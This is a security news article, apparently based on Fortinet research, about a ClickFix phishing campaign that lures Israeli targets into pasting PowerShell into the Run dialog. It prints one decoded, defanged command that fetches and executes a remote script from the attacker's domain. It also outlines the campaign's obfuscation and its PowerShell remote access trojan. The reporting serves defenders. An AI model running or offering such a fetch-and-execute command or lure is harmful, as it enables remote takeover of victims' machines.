A sophisticated new attack campaign has emerged targeting Israeli businesses and infrastructure sectors through a deceptive social engineering technique known as “ClickFix,” which tricks users into executing malicious PowerShell commands on their Windows systems.
The multi-stage attack chain begins with phishing emails disguised as invitations to educational webinars about handling wartime medical supplies, demonstrating how threat actors exploit current regional tensions to enhance their social engineering effectiveness.
.webp "Hackers Using ClickFix Technique to Attack Windows Machine and Execute Powershell Commands 2")
The attack operates through a carefully orchestrated sequence that starts when victims click on embedded links in phishing emails, redirecting them to spoofed Microsoft Teams pages.
These fake landing pages instruct users to perform a specific sequence of actions: pressing Windows+R to open the Run dialog box, pasting a copied string using Ctrl+V, and pressing Enter to execute what appears to be a legitimate verification process.
However, this sequence actually triggers the execution of a malicious PowerShell command that initiates the infection chain.
Fortinet analysts identified this targeted intrusion campaign through their FortiMail Workspace Security team, revealing that the entire attack relies exclusively on PowerShell execution without requiring external executables.
The researchers discovered evidence of lateral movement and surveillance activity, along with potential overlaps with MuddyWater campaign tactics, though attribution remains inconclusive due to notable tactical differences from traditional MuddyWater operations.
The initial payload contains a Base64-encoded PowerShell command obfuscated across three strings within the phishing site’s HTML code.
Once concatenated and decoded, it produces the following command:-
powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET)[.]note[.]body)This command initiates the retrieval and execution of a secondary PowerShell script from the attacker’s infrastructure, establishing the foundation for the complete compromise of the target system.
Multi-Stage Obfuscation and Payload Delivery
The attack employs sophisticated obfuscation techniques that demonstrate advanced technical capabilities.
After the initial payload execution, the malware downloads two critical files: test.html, which contains a blob object with binary data encoded between special tag markers, and a secondary PowerShell script that reconstructs the final malicious payload.
.webp "Hackers Using ClickFix Technique to Attack Windows Machine and Execute Powershell Commands 4")
The script employs a unique decoding mechanism that splits binary-encoded chunks separated by the delimiter “kendrick,” converts them from binary to ASCII characters, and reassembles the result into executable PowerShell code.
The final stage deploys a remote access trojan entirely through PowerShell, establishing persistent communication with the command and control server at pharmacynod[.]com.
The malware implements multiple stealth techniques including GZip compression, Base64 encoding, string reversal, and legitimate User-Agent strings to evade detection while maintaining continuous surveillance capabilities on compromised systems.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
